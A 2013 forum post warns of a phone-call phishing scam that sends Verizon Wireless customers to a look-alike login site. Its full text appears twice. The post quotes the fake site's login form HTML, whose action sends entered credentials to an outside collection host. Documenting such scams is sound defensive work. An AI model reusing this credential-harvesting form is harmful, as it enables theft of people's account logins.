by yourpal2013
Thu Oct 31, 2013 11:53 pm
Contacted Verizon Wireless about this, they are aware but unable to take action at this moment.
Fake site: http://www.vzw183.com
You'll receive a strange recorded message on your Verizon Wireless phone informing you that, lucky you, you can save about $150 on your month's next bill if you login to http://www.vzw183.com (note the "real" verizon site is VZW.com)
If you visit the website (which hotlinks images and scripts directly from the official VZW.com which Verizon has not blocked), you'll be asked to login. It looks very convincing and will fool folks. If you type in "valid" (ie passes their form validation) credentials, the site will go to a landing page (http://www.vzw183.com/success.php) and redirect you to verizonwireless.com
The site VZW183.com is stealing assets directly from VZW.com but it has still not been blocked.
Here are the FORM POST details from the email: http://puck1098.startdedicated.com/results
<form id="myaccountForm" name="myaccountForm" method="post" action="http://puck1098.startdedicated.com/results">
<input type="hidden" name="client_ip" id="client_ip" value="71.106.51.95" />
<input type="hidden" name="web" id="web" value="vzw183" />
<input type="hidden" name="return_success" id="return_success" value="http://www.vzw183.com/success.php" />
<input type="hidden" name="return_fail" id="return_fail" value="http://www.vzw183.com/index.php?valid=failed" />
<input type="hidden" name="goto" id="goto" value="" />
<input type="hidden" name="realm" id="realm" value="vzw" />
<input type="hidden" name="gx_charset" id="gx_charset" value="UTF-8" />
<input type="hidden" name="rememberUserNameCheckBoxExists" id="rememberUNameExists" value="N" />
Fake site: http://www.vzw183.com
You'll receive a strange recorded message on your Verizon Wireless phone informing you that, lucky you, you can save about $150 on your month's next bill if you login to http://www.vzw183.com (note the "real" verizon site is VZW.com)
If you visit the website (which hotlinks images and scripts directly from the official VZW.com which Verizon has not blocked), you'll be asked to login. It looks very convincing and will fool folks. If you type in "valid" (ie passes their form validation) credentials, the site will go to a landing page (http://www.vzw183.com/success.php) and redirect you to verizonwireless.com
The site VZW183.com is stealing assets directly from VZW.com but it has still not been blocked.
Here are the FORM POST details from the email: http://puck1098.startdedicated.com/results
<form id="myaccountForm" name="myaccountForm" method="post" action="http://puck1098.startdedicated.com/results">
<input type="hidden" name="client_ip" id="client_ip" value="71.106.51.95" />
<input type="hidden" name="web" id="web" value="vzw183" />
<input type="hidden" name="return_success" id="return_success" value="http://www.vzw183.com/success.php" />
<input type="hidden" name="return_fail" id="return_fail" value="http://www.vzw183.com/index.php?valid=failed" />
<input type="hidden" name="goto" id="goto" value="" />
<input type="hidden" name="realm" id="realm" value="vzw" />
<input type="hidden" name="gx_charset" id="gx_charset" value="UTF-8" />
<input type="hidden" name="rememberUserNameCheckBoxExists" id="rememberUNameExists" value="N" />